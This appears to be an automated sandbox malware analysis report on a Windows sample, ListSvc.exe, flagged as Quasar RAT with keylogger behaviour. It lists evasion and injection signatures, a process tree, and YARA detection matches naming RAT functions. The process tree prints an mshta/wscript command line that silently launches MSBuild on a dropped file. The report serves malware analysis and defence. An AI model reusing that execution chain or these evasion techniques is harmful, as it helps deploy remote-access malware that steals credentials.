Play interactive tour

Edit tour

Windows Analysis Report ListSvc.exe

Overview

General Information

Sample Name:	ListSvc.exe
Analysis ID:	501764
MD5:	e16ddbbcdf1693d6fba70e92b140e8f7
SHA1:	c51278af66509cadd17bb99a1f83c962144c7adb
SHA256:	41e4a08b21bdfd7b06a90764d4636601a56e55f3fa82515d2599eabcd5dd9f68
Infos:
Most interesting Screenshot:

Detection

Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AntiVM3

Antivirus detection for dropped file

Yara detected Quasar RAT

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

May check the online IP address of the machine

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Contains functionality to disable the Task Manager (.Net Source)

Sample uses process hollowing technique

Installs a global keyboard hook

Writes to foreign memory regions

.NET source code references suspicious native API functions

Machine Learning detection for dropped file

Sigma detected: Suspicious Csc.exe Source File Folder

Deletes shadow drive data (may be related to ransomware)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Creates a start menu entry (Start Menu\Programs\Startup)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to shutdown / reboot the system

May infect USB drives

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Enables debug privileges

PE file does not import any functions

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w10x64

ListSvc.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\ListSvc.exe' MD5: E16DDBBCDF1693D6FBA70E92B140E8F7)

ListSvc.tmp (PID: 6296 cmdline: 'C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp' /SL5='$6001E,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' MD5: 41DE4778D27FFED036A89EF9E32156EE)

ListSvc.exe (PID: 6348 cmdline: 'C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT MD5: E16DDBBCDF1693D6FBA70E92B140E8F7)

ListSvc.tmp (PID: 6368 cmdline: 'C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp' /SL5='$50392,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT MD5: 41DE4778D27FFED036A89EF9E32156EE)

AppLaunch.exe (PID: 6384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

MSBuild.exe (PID: 6392 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet' MD5: D621FD77BD585874F9686D3A76462EF1)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 6408 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url' MD5: D621FD77BD585874F9686D3A76462EF1)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6752 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 6892 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3401.tmp' 'c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)

RegAsm.exe (PID: 6340 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6304 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6420 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

AppLaunch.exe (PID: 6424 cmdline: C:\Users\user\AppData\Roaming\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)

mshta.exe (PID: 4240 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:execute('createobject(''wscript.shell'').run ''\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild ''''C:\Users\user\AppData\Local\Temp\ListSvc.url'''''',0:close()') MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

MSBuild.exe (PID: 6656 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Local\Temp\ListSvc.url' MD5: D621FD77BD585874F9686D3A76462EF1)

conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 3312 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF3F6.tmp' 'c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)

RegAsm.exe (PID: 476 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
dropped/ListSvc.lnk	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x239:$s12: wscript.shell
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x239:$s12: wscript.shell

Memory Dumps

Source	Rule	Description	Author	Strings
00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35cd7:$s1: DoUploadAndExecute 0x35ee5:$s2: DoDownloadAndExecute 0x35adb:$s3: DoShellExecute 0x35eaa:$s4: set_Processname 0x69c8:$op1: 04 1E FE 02 04 16 FE 01 60 0x68ec:$op2: 00 17 03 1F 20 17 19 15 28 0x7352:$op3: 00 04 03 69 91 1B 40 0x7ba2:$op3: 00 04 03 69 91 1B 40
00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35cd7:$s1: DoUploadAndExecute 0x35ee5:$s2: DoDownloadAndExecute 0x35adb:$s3: DoShellExecute 0x35eaa:$s4: set_Processname 0x69c8:$op1: 04 1E FE 02 04 16 FE 01 60 0x68ec:$op2: 00 17 03 1F 20 17 19 15 28 0x7352:$op3: 00 04 03 69 91 1B 40 0x7ba2:$op3: 00 04 03 69 91 1B 40
00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x2ae5cf:$s1: DoUploadAndExecute 0x2ae7dd:$s2: DoDownloadAndExecute 0x2ae3d3:$s3: DoShellExecute 0x2ae7a2:$s4: set_Processname 0x27f2c0:$op1: 04 1E FE 02 04 16 FE 01 60 0x27f1e4:$op2: 00 17 03 1F 20 17 19 15 28 0x27fc4a:$op3: 00 04 03 69 91 1B 40 0x28049a:$op3: 00 04 03 69 91 1B 40
00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x2ae5cf:$s1: DoUploadAndExecute 0x2ae7dd:$s2: DoDownloadAndExecute 0x2ae3d3:$s3: DoShellExecute 0x2ae7a2:$s4: set_Processname 0x27f2c0:$op1: 04 1E FE 02 04 16 FE 01 60 0x27f1e4:$op2: 00 17 03 1F 20 17 19 15 28 0x27fc4a:$op3: 00 04 03 69 91 1B 40 0x28049a:$op3: 00 04 03 69 91 1B 40
00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 6408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 6408	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 6420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 6420	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 6656	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 6656	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 6344	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 6344	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.RegAsm.exe.400000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
23.2.RegAsm.exe.400000.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
23.2.RegAsm.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
23.2.RegAsm.exe.400000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
23.2.RegAsm.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
23.2.RegAsm.exe.400000.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
6.2.MSBuild.exe.37926f8.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x34b7a:$x3: GetKeyloggerLogsResponse 0x33e51:$x4: GetKeyloggerLogs 0x340ea:$s1: <RunHidden>k__BackingField 0x34d42:$s2: set_SystemInfos 0x34113:$s3: set_RunHidden 0x33ca6:$s4: set_RemotePath 0x45c28:$s6: Client.exe 0x45cbc:$s6: Client.exe 0x2eb71:$s7: xClient.Core.ReverseProxy.Packets
6.2.MSBuild.exe.37926f8.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2d983:$x4: xClient.Properties.Resources.resources 0x2d821:$s4: Client.exe 0x34113:$s7: set_RunHidden
6.2.MSBuild.exe.37926f8.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340d7:$s1: DoUploadAndExecute 0x342e5:$s2: DoDownloadAndExecute 0x33edb:$s3: DoShellExecute 0x342aa:$s4: set_Processname 0x4dc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x4cec:$op2: 00 17 03 1F 20 17 19 15 28 0x5752:$op3: 00 04 03 69 91 1B 40 0x5fa2:$op3: 00 04 03 69 91 1B 40
6.2.MSBuild.exe.37926f8.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x34b7a:$x1: GetKeyloggerLogsResponse 0x34dba:$s1: DoShellExecuteResponse 0x34733:$s2: GetPasswordsResponse 0x34c8d:$s3: GetStartupItemsResponse 0x340eb:$s5: RunHidden 0x34109:$s5: RunHidden 0x34117:$s5: RunHidden 0x3412b:$s5: RunHidden
6.2.MSBuild.exe.37926f8.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x3e255:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x3e425:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.MSBuild.exe.37926f8.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4071d:$x2: Process already elevated. 0x324a0:$x4: get_encryptedPassword 0x342e5:$x5: DoDownloadAndExecute
6.2.MSBuild.exe.37926f8.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
25.2.MSBuild.exe.5450000.3.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x34b7a:$x3: GetKeyloggerLogsResponse 0x33e51:$x4: GetKeyloggerLogs 0x340ea:$s1: <RunHidden>k__BackingField 0x34d42:$s2: set_SystemInfos 0x34113:$s3: set_RunHidden 0x33ca6:$s4: set_RemotePath 0x45c28:$s6: Client.exe 0x45cbc:$s6: Client.exe 0x2eb71:$s7: xClient.Core.ReverseProxy.Packets
25.2.MSBuild.exe.5450000.3.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2d983:$x4: xClient.Properties.Resources.resources 0x2d821:$s4: Client.exe 0x34113:$s7: set_RunHidden
25.2.MSBuild.exe.5450000.3.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340d7:$s1: DoUploadAndExecute 0x342e5:$s2: DoDownloadAndExecute 0x33edb:$s3: DoShellExecute 0x342aa:$s4: set_Processname 0x4dc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x4cec:$op2: 00 17 03 1F 20 17 19 15 28 0x5752:$op3: 00 04 03 69 91 1B 40 0x5fa2:$op3: 00 04 03 69 91 1B 40
25.2.MSBuild.exe.5450000.3.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x34b7a:$x1: GetKeyloggerLogsResponse 0x34dba:$s1: DoShellExecuteResponse 0x34733:$s2: GetPasswordsResponse 0x34c8d:$s3: GetStartupItemsResponse 0x340eb:$s5: RunHidden 0x34109:$s5: RunHidden 0x34117:$s5: RunHidden 0x3412b:$s5: RunHidden
25.2.MSBuild.exe.5450000.3.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x3e255:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x3e425:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
25.2.MSBuild.exe.5450000.3.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4071d:$x2: Process already elevated. 0x324a0:$x4: get_encryptedPassword 0x342e5:$x5: DoDownloadAndExecute
25.2.MSBuild.exe.5450000.3.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
6.2.MSBuild.exe.5120000.3.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x34b7a:$x3: GetKeyloggerLogsResponse 0x33e51:$x4: GetKeyloggerLogs 0x340ea:$s1: <RunHidden>k__BackingField 0x34d42:$s2: set_SystemInfos 0x34113:$s3: set_RunHidden 0x33ca6:$s4: set_RemotePath 0x45c28:$s6: Client.exe 0x45cbc:$s6: Client.exe 0x2eb71:$s7: xClient.Core.ReverseProxy.Packets
6.2.MSBuild.exe.5120000.3.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2d983:$x4: xClient.Properties.Resources.resources 0x2d821:$s4: Client.exe 0x34113:$s7: set_RunHidden
6.2.MSBuild.exe.5120000.3.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340d7:$s1: DoUploadAndExecute 0x342e5:$s2: DoDownloadAndExecute 0x33edb:$s3: DoShellExecute 0x342aa:$s4: set_Processname 0x4dc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x4cec:$op2: 00 17 03 1F 20 17 19 15 28 0x5752:$op3: 00 04 03 69 91 1B 40 0x5fa2:$op3: 00 04 03 69 91 1B 40
6.2.MSBuild.exe.5120000.3.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x34b7a:$x1: GetKeyloggerLogsResponse 0x34dba:$s1: DoShellExecuteResponse 0x34733:$s2: GetPasswordsResponse 0x34c8d:$s3: GetStartupItemsResponse 0x340eb:$s5: RunHidden 0x34109:$s5: RunHidden 0x34117:$s5: RunHidden 0x3412b:$s5: RunHidden
6.2.MSBuild.exe.5120000.3.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x3e255:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x3e425:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.MSBuild.exe.5120000.3.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4071d:$x2: Process already elevated. 0x324a0:$x4: get_encryptedPassword 0x342e5:$x5: DoDownloadAndExecute
6.2.MSBuild.exe.5120000.3.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
6.2.MSBuild.exe.5120000.3.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
6.2.MSBuild.exe.5120000.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
6.2.MSBuild.exe.5120000.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
6.2.MSBuild.exe.5120000.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
